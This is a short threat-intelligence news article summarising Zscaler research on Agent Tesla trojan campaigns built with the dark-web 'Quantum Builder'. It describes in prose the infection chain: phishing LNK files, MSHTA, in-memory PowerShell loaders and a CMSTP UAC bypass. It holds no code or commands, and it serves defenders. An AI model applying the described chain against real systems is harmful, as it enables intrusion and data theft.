The Quantum Builder is offered on the Dark Web and various variants of the Remote Access Trojan (RAT) Agent Tesla are distributed. Overall, the malware relies on LNK files (Windows shortcuts) to spread the Trojan. There is even a service package for cyber criminal partners.
Agent Tesla, a .NET-based keylogger and remote access trojan (RAT) since 2014, is currently being distributed via a builder sold on the dark web called "Quantum Builder". Security researchers from the Zscaler ThreatlabZ team examined the current campaign and identified an evolution. Malware authors now rely on LNK files (Windows shortcuts) to proliferate the payload, which Quantum Builder (aka "Quantum Lnk Builder") is used to create. The builder has already been proven in campaigns linked to the RedLine Stealer, IcedID, GuLoader, the RemcosRAT and the AsyncRAT.
Malicious Windows shortcuts – LNKs
In the current campaign, threat actors use Quantum Builder to generate malicious LNK, HTA, and PowerShell payloads, which Agent Tesla then pushes onto targeted machines. The builder-generated payloads use sophisticated techniques such as UAC bypass with the Microsoft Connection Manager Profile Installer (CMSTP) binary to run the final payload with administrative privileges and bypass Windows Defender. A multi-stage infection chain is used, which integrates various attack vectors with LOLBins. To bypass detection, PowerShell scripts run in memory. In addition, the victims are distracted from the infection by various deceptive maneuvers.
Start with spear phishing email
The chain of infection starts with a spear phishing email containing an LNK file in the form of a GZIP archive. After executing the LNK file, the embedded PowerShell code calls MSHTA, which runs the HTA file hosted on the remote server. The HTA file then decrypts a PowerShell loader script, which decrypts and loads another PowerShell script after performing an AES decryption and GZIP decompression. The decrypted PowerShell script is the Downloader PS script, which first downloads the Agent Tesla binary from a remote server and then runs it with administrative privileges by performing a UAC bypass with CMSTP.
The builder also uses techniques like decoys, UAC prompts, and in-memory PowerShell to run the final payload. They are all constantly updated, so it is a service pack from the malware developers.
Service package for cyber criminal partners
Threat actors are constantly evolving their tactics using software such as malware "builders" sold on relevant cybercrime marketplaces on the dark web. The Agent Tesla campaign is the latest in a series of similarly structured activities that used Quantum Builder to create malicious payloads in anti-organization campaigns. The techniques used are regularly updated by the malware developers and adapted to the new security mechanisms.
More at Zscaler.com
About Zscaler Zscaler accelerates digital transformation so customers can become more agile, efficient, resilient, and secure. Zscaler Zero Trust Exchange protects thousands of customers from cyberattacks and data loss by securely connecting people, devices, and applications anywhere. The SSE-based Zero Trust Exchange is the world's largest inline cloud security platform, distributed across 150+ data centers around the world.